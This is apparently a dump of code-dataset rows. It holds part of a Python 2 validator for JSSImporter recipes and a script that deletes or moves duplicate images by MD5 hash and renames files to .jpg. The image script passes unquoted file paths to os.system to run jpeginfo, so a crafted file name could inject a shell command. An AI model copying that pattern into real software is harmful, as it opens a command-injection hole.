def test_extension_attributes(recipe):
"""Determine whether extension attributes are configured.
Args:
recipe: Recipe object.
Returns:
Tuple of Bool: Failure or success, and a string describing the
test and result.
"""
result = False
description = "Recipe has no extension attributes."
extension_attributes = get_jssimporter(
recipe)["Arguments"].get("extension_attributes")
if not extension_attributes:
result = True
else:
description += (" (WARNING: Extension attributes only allowed when "
"absolutely necessary.")
result, description = test_extension_attribute_arguments(recipe)
return (result, description)
def test_extension_attribute_arguments(recipe):
"""Determine whether extension attributes are configured correctly.
Args:
recipe: Recipe object.
Returns:
Tuple of Bool: Failure or success, and a string describing the
test and result.
"""
result = False
name = recipe["Input"].get("NAME")
description = ("WARNING: Recipe has extension attributes. Extension "
"attributes meet style guidelines.")
extension_attributes = get_jssimporter(
recipe)["Arguments"].get("extension_attributes")
ext_attr_templates = [ext_attr.get("ext_attribute_path") for ext_attr in
extension_attributes if
ext_attr.get("ext_attribute_path") not in
ALLOWED_EXTENSION_ATTRIBUTES]
template_names_compliant = all((filename.startswith(name) and
filename.endswith("ExtensionAttribute.xml")
for filename in ext_attr_templates))
directory = os.path.dirname(recipe.filename)
templates_exist = all((os.path.isfile(os.path.join(directory, filename))
for filename in ext_attr_templates))
result = template_names_compliant and templates_exist
return (result, description)
def test_scripts(recipe):
"""Determine whether scripts are configured.
Args:
recipe: Recipe object.
Returns:
Tuple of Bool: Failure or success, and a string describing the
test and result.
"""
result = False
description = "Recipe has no scripts."
scripts = get_jssimporter(
recipe)["Arguments"].get("scripts")
if not scripts:
result = True
else:
description += (" (WARNING: Scripts only allowed when absolutely "
"necessary.")
result, description = test_scripts_arguments(recipe)
return (result, description)
def test_scripts_arguments(recipe):
"""Determine whether scripts are configured correctly.
Args:
recipe: Recipe object.
Returns:
Tuple of Bool: Failure or success, and a string describing the
test and result.
"""
result = False
name = recipe["Input"].get("NAME")
description = ("WARNING: Recipe has scripts. Scripts arguments meet "
"style guidelines.")
scripts = get_jssimporter(recipe)["Arguments"].get("scripts")
script_templates = [script.get("template_path") for script in scripts]
template_names_compliant = all((filename.startswith(name) and
filename.endswith("ScriptTemplate.xml") for
filename in script_templates))
directory = os.path.dirname(recipe.filename)
templates_exist = all((os.path.isfile(os.path.join(directory, filename))
for filename in script_templates))
script_names = [script.get("name") for script in scripts]
script_names_compliant = all((filename.startswith(name) for filename in
script_names))
result = (template_names_compliant and templates_exist and
script_names_compliant)
return (result, description)
def test_icon(recipe):
"""Determine whether recipe file exists and parses.
Args:
recipe: Recipe object.
Returns:
Tuple of Bool: Failure or success, and a string describing the
test and result.
"""
allowed_dimensions = (128, 300)
result = False
description = "Icon is a 128x128px PNG file."
directory = os.path.dirname(recipe.filename)
icon_filename = recipe["Input"].get("SELF_SERVICE_ICON")
if icon_filename == "%NAME%.png":
icon_filename = "%s.png" % recipe["Input"].get("NAME")
icon_path = os.path.join(directory, icon_filename)
if os.path.exists(icon_path):
width, height, format = get_image_properties(icon_path)
if (width in allowed_dimensions and height == width and
format.upper() == "PNG"):
result = True
else:
description += " (Image is %ix%i of type %s)" % (width, height,
format)
else:
description += " (Icon not found)"
return (result, description)
def get_image_properties(path):
"""Get the width, height, and format of an image using sips.
Args:
path: String path to image file.
Returns:
Tuple of (int: width, int: height, and string: image format)
"""
args = ["/usr/bin/sips", "-g", "pixelWidth", "-g", "pixelHeight", "-g",
"format", path]
output = subprocess.check_output(args).splitlines()
width = int(output[1].rsplit()[-1])
height = int(output[2].rsplit()[-1])
format = output[3].rsplit()[-1]
return width, height, format
def test_lint(recipe):
"""Determine whether recipe file lints.
Args:
recipe: Recipe object.
Returns:
Tuple of Bool: Failure or success, and a string describing the
test and result.
"""
result = False
description = "Recipe file passes plutil -lint test."
args = ["/usr/bin/plutil", "-lint", recipe.filename]
output = subprocess.check_output(args)
if output.rsplit()[-1] == "OK":
result = True
return (result, description)
def print_bar(length=79):
"""Print a line of '-'s."""
print length * "-"
def main():
parser = get_argument_parser()
args = parser.parse_args()
for recipes_arg in args.recipe:
recipes = get_recipes(recipes_arg)
for recipe in recipes:
validate_recipe(recipe, args.verbose)
if __name__ == "__main__":
main()
|
[
"[email protected]"
] | |
b733ea8133fef7f09f21b15c9685e7e52dd55c44
|
eecef46270f30ca7aa37e91da29535051ece8912
|
/tensorflow/tensorflow_tools/data_prepocess_tools/md5_compare.py
|
a70a69f076286c902298e0d803264d048e2b590b
|
[
"Apache-2.0"
] |
permissive
|
bowen9799/cuisine-detection
|
c1680153b8102207bf64fb9c1b527291d552cb23
|
c805e82b1d13aede835b5ffb4713addf9dd4f5ec
|
refs/heads/master
| 2020-03-19T13:40:48.881447 | 2018-06-12T23:50:29 | 2018-06-12T23:50:29 | 136,590,148 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,269 |
py
|
# -*- coding: utf-8 -*-
import os
#import cv2
import shutil
import sys,md5
import numpy as np
#from matplotlib import pyplot as plt
#from pdb import set_trace
import click
reload(sys)
sys.setdefaultencoding('utf-8')
def classify_gray_hist(hist1,hist2):
degree = 0
for i in range(len(hist1)):
if hist1[i] != hist2[i]:
degree = degree + (1 - abs(hist1[i]-hist2[i])/max(hist1[i],hist2[i]))
else:
degree = degree + 1
degree = degree/len(hist1)
return degree
def scan_folder(path,s):
files= os.listdir(path) #得到文件夹下的所有文件名称
for file in files: #遍历文件夹
file_path = os.path.join(path,file)
if not os.path.isdir(file_path): #判断是否是文件夹,不是文件夹才打开
# use jpeginfo to check jpg image first.
jpgcheck = 'jpeginfo' +' -c ' + file_path + ' -d' +'\n'
#print "jpgpath %s"%(jpgcheck)
#sys.stdout.write('\n')
#sys.stdout.flush()
os.system(jpgcheck)
if os.path.isfile(file_path):
f1 = open(file_path,'r')
md5_value = md5.new(f1.read()).digest()
s.append([path+"/"+file,md5_value])
else:
print "%s is deleted\n"%(file_path)
else:
scan_folder(file_path,s)
return s
def scan_folder_and_remove_same(path):
s=[]
files= os.listdir(path) #得到文件夹下的所有文件名称
for file in files: #遍历文件夹
file_path = os.path.join(path,file)
if not os.path.isdir(file_path): #判断是否是文件夹,不是文件夹才打开
if False:
# use jpeginfo to check jpg image first.
jpgcheck = 'jpeginfo' +' -c ' + file_path + ' -d' +'\n'
os.system(jpgcheck)
if os.path.isfile(file_path):
f1 = open(file_path,'r')
md5_value = md5.new(f1.read()).digest()
if md5_value in s :
os.remove(file_path)
else:
s.append(md5_value)
#change file houzhui
if os.path.splitext(file_path)[1] != ".jpg":
newname = os.path.splitext(file_path)[0]+".jpg" #要改的新后缀
os.rename(file_path,newname)
else:
print "%s is deleted\n"%(file_path)
else:
f1 = open(file_path,'r')
md5_value = md5.new(f1.read()).digest()
if md5_value in s :
os.remove(file_path)
else:
s.append(md5_value)
else:
scan_folder_and_remove_same(file_path)
return s
def mymovefile(srcfile,dstfile):
if not os.path.isfile(srcfile):
print "%s not exist!"%(srcfile)
else:
fpath,fname=os.path.split(dstfile) #分离文件名和路径
if not os.path.exists(fpath):
os.makedirs(fpath) #创建路径
shutil.move(srcfile,dstfile) #移动文件
print "move %s -> %s"%( srcfile,dstfile)
def compare_and_move(path, compared_path):
file_list = []
scan_folder(path,file_list)
s_images = []
print(path)
for i in range(len(file_list)-1):
#print(i)
for j in range(i+1,len(file_list)):
if file_list[i][1]==file_list[j][1]:
s_images.append(file_list[j][0])
print(file_list[i][0],file_list[j][0])
s_images_path = list(set(s_images))
for s_image_path in s_images:
s_image = s_image_path.split("/")[-1]
mymovefile(s_image_path, compared_path + "/" + s_image)
def compare_and_delete(path):
scan_folder_and_remove_same(path)
@click.command()
@click.option('--input_dir', default='./food_classify', help='root path of image folder')
#@click.option('--same_data_dir', default='./food_same', help='file search pattern for glob')
#def main(input_dir, same_data_dir):
#compare_and_move(input_dir,same_data_dir)
def main(input_dir):
compare_and_delete(input_dir)
if __name__ == '__main__':
main()
|
[
"[email protected]"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.